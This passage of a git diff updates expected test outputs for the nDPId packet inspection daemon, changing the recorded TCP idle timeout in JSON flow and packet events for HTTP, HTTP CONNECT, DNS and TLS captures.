-00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1381844050222,"flow_last_seen":1381844057320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":18376,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1381844057320,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1381844050222,"flow_last_seen":1381844050222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1381844050222,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1381844050222,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1381844050222,"pkt":"TBfruiThKM\/pITwrCABFAABARSdAAEAGtjzAqAAEwP69qdRBAFCa4jGyAAAAALAC\/\/8jTAAAAgQFtAEDAwQBAQgKH38TuAAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1381844050402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1381844050402,"pkt":"KM\/pITwrTBfruiThCABFAAA8AABAADgGA2jA\/r2pwKgABABQ1EEDZtH9muIxs6ASOJA\/hAAAAgQFtAQCCAowzbX3H38TuAEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1381844050402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1381844050402,"pkt":"TBfruiThKM\/pITwrCABFAAA0XSJAAEAGnk3AqAAEwP69qdRBAFCa4jGzA2bR\/oAQICuGBAAAAQEICh9\/FGkwzbX3"} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1381844050222,"flow_last_seen":1381844050402,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":739,"flow_tot_l4_payload_len":739,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1381844050402,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"browserspy.dk","url":"browserspy.dk\/password-ok.php","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/30.0.1599.69 Safari\/537.36"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1381844050222,"flow_last_seen":1381844057320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":18376,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1381844057320,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","packets-captured":33,"packets-processed":33,"total-skipped-flows":0,"total-l4-data-len":18376,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1381844057320} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 33/33 diff --git a/test/results/http_connect.pcap.out b/test/results/http_connect.pcap.out index 6d7aad09a..c18b1d5b8 100644 --- a/test/results/http_connect.pcap.out +++ b/test/results/http_connect.pcap.out @@ -1,24 +1,24 @@ 00463{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http_connect.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1631454722864} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722864,"flow_last_seen":1631454722864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631454722864,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1631454722864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"AAwpTU5kKBaoBOm8CABFAAA0iNFAAIAG7ajAqAFnwKgBkgayH5A7mDABAAAAAIAC+vBd+gAAAgQFtAEDAwgBAQQC"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1631454722864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"KBaoBOm8AAwpTU5kCABFAAA0AABAAEAGtnrAqAGSwKgBZx+QBrLnDc0lO5gwAoAS+vCEcAAAAgQFtAEBBAIBAwMH"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1631454722866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1631454722866,"pkt":"AAwpTU5kKBaoBOm8CABFAAAoiNJAAIAG7bPAqAFnwKgBkgayH5A7mDAC5w3NJlAQBALhdwAAAAAAAAAA"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722864,"flow_last_seen":1631454722867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722864,"flow_last_seen":1631454722864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631454722864,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1631454722864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"AAwpTU5kKBaoBOm8CABFAAA0iNFAAIAG7ajAqAFnwKgBkgayH5A7mDABAAAAAIAC+vBd+gAAAgQFtAEDAwgBAQQC"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1631454722864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"KBaoBOm8AAwpTU5kCABFAAA0AABAAEAGtnrAqAGSwKgBZx+QBrLnDc0lO5gwAoAS+vCEcAAAAgQFtAEBBAIBAwMH"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1631454722866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1631454722866,"pkt":"AAwpTU5kKBaoBOm8CABFAAAoiNJAAIAG7bPAqAFnwKgBkgayH5A7mDAC5w3NJlAQBALhdwAAAAAAAAAA"} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722864,"flow_last_seen":1631454722867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1631454722867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1631454722867,"pkt":"AAwpGN5XAAwpTU5kCABFAABDZMpAAEARUfvAqAGSwKgBArqXADUAL4Ql9bcBAAABAAAAAAABBmFwYWNoZQNvcmcAAAEAAQAAKQIAAAAAAAAA"} 00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apache.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1631454722867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1631454722867,"pkt":"AAwpTU5kAAwpGN5XCABFAABTqZtAAEARDRrAqAECwKgBkgA1upcAP92U9beBgAABAAEAAAABBmFwYWNoZQNvcmcAAAEAAcAMAAEAAQAAA0oABJdlAoQAACkE0AAAAAAAAA=="} 00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apache.org","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.2.132"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1631454722867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722867,"pkt":"ACWQX+cTAAwpTU5kCABFAAA8Fy1AAEAGx2vAqAGSl2UChIyAAbsTD57aAAAAAKAC+vBcUgAAAgQFtAQCCAoKBFeEAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1631454722876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722876,"pkt":"AAwpTU5kACWQX+cTCABFAAA8AABAADwG4piXZQKEwKgBkgG7jICt6jOtEw+e26AS\/\/+T8gAAAgQFdAQCCAosPaiUCgRXhAEDAwk="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1631454722876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722876,"pkt":"ACWQX+cTAAwpTU5kCABFAAA0Fy5AAEAGx3LAqAGSl2UChIyAAbsTD57breozroAQAfZcSgAAAQEICgoEV40sPaiU"} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722867,"flow_last_seen":1631454722879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631454722879,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631454722867,"flow_last_seen":1631454722895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":1901,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1631454722895,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1631454722867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722867,"pkt":"ACWQX+cTAAwpTU5kCABFAAA8Fy1AAEAGx2vAqAGSl2UChIyAAbsTD57aAAAAAKAC+vBcUgAAAgQFtAQCCAoKBFeEAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1631454722876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722876,"pkt":"AAwpTU5kACWQX+cTCABFAAA8AABAADwG4piXZQKEwKgBkgG7jICt6jOtEw+e26AS\/\/+T8gAAAgQFdAQCCAosPaiUCgRXhAEDAwk="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1631454722876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722876,"pkt":"ACWQX+cTAAwpTU5kCABFAAA0Fy5AAEAGx3LAqAGSl2UChIyAAbsTD57breozroAQAfZcSgAAAQEICgoEV40sPaiU"} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722867,"flow_last_seen":1631454722879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631454722879,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631454722867,"flow_last_seen":1631454722895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":1901,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1631454722895,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1631454722867,"flow_last_seen":1631454722977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":32652,"flow_avg_l4_payload_len":562,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1631454722864,"flow_last_seen":1631454722977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5536,"flow_tot_l4_payload_len":24627,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1631454722867,"flow_last_seen":1631454722977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":32652,"flow_avg_l4_payload_len":562,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1631454722864,"flow_last_seen":1631454722977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5536,"flow_tot_l4_payload_len":24627,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-data-len":57373,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":1631454722977} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 diff --git a/test/results/http_ipv6.pcap.out b/test/results/http_ipv6.pcap.out index d63dd103b..9fdc02f43 100644 --- a/test/results/http_ipv6.pcap.out +++ b/test/results/http_ipv6.pcap.out @@ -1,100 +1,100 @@ 